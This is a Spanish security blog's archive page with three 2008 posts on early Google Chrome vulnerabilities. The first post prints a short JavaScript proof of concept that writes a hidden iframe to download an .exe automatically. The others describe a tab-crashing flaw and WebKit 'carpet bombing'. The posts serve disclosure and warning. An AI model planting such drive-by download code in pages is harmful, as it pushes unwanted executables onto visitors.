Archivos de Etiquetas: Google Chrome

Muy Bonito, Muy de la Casa, MUY INSEGURO

4 septiembre 2008 16 Comentarios

El Nuevo de puede ser muy rápido, muy bonito, consumir poca memoria, tener muchas funciones “WoW” pero en estos 2 días ha demostrado que es muy inseguro hoy me entero gracias a un comentario de exactlimon sobre un nuevo fallo en que permite (de cualquier tipo) sin el consentimiento del usuario.

Este fallo descubierto nerex y publicado en milw0rm.com consiste simplemente en escribir el siguiente código JavaScript en un sitio malicioso y automáticamente al visitar este sitio se descargara la aplicación mencionada.

<script>
document.write('<iframe src="http://www.dragonjar.org/calc.exe" frameborder="0" width="0" height="0">');
</script>

He subido una prueba de concepto al servidor con la calculadora de windows y  haciendo click aquí obtendrás algo parecido a esto.

chrome2nk7 Muy Bonito, Muy de la Casa, MUY INSEGURO

El archivo no se ejecuta, pero estoy seguro que con otro nombre e icono mas llamativos muchos lo abrirían solo por “curiosidad”, al parecer Google se ha dado cuenta de la cantidad de errores que tiene su navegador y ha dejado de promocionarlo en su pagina principal actualizado, han vuelto a promocionarlo en la pagina principal de google.

chromejg9 Muy Bonito, Muy de la Casa, MUY INSEGURO

La version afectada con este y los otros fallos de seguridad mencionados anteriormente en el portal es la 0.2.149.27 les recomiendo que no utilicen este navegador al menos hasta que salga una nueva versión con estos problemas solucionados.

Mas Información:
http://milw0rm.com/exploits/6355
Primera Vulnerabilidad en Google Chrome
Nueva Vulnerabilidad en Google Chrome

Noticias Seguridad, Seguridad Web
, , , , , ,

Nueva Vulnerabilidad en Google Chrome

3 septiembre 2008 9 Comentarios

logosmet1 Nueva Vulnerabilidad en Google Chrome

Ayer les comentaba sobre la Primera Vulnerabilidad en Google Chrome, hoy Rishi Narang ha descubierto una nueva que permite bloquear TODAS las pestañas de el ya famoso de .

El fallo radica en la librería chrome.dll (versión 0.2.149.27) del navegador que permite bloquear todas las pestañas del mostrando el mensaje “!Vaya¡ ha fallado. ¿Deseas reiniciar?” con solo visitar un enlace en una pagina mal intencionada, pasando por alto la aclamada funcionalidad de “pestañas independientes” de este navegador (ver imagen). Leer más…

Noticias Seguridad, Seguridad Web
, , ,

Primera Vulnerabilidad en Google Chrome

2 septiembre 2008 9 Comentarios

f2008090214372428047308tf9 Primera Vulnerabilidad en Google Chrome

No ha pasado ni 24 horas desde que anuncio oficialmente su navegador “Google Chrome” y ya ha sido detectada la primera en este.

 es  vulnerable a “carpet bombing“, una vulnerabilidad descubierta por el investigador Aviv Raff en el motor web opensource  Webkit (Base del Google Chrome y Safari) que permite automáticamente  cuando el usuario navega por una página maliciosa. Leer más…

Noticias Seguridad, Seguridad Web
, , ,
Entradas Siguientes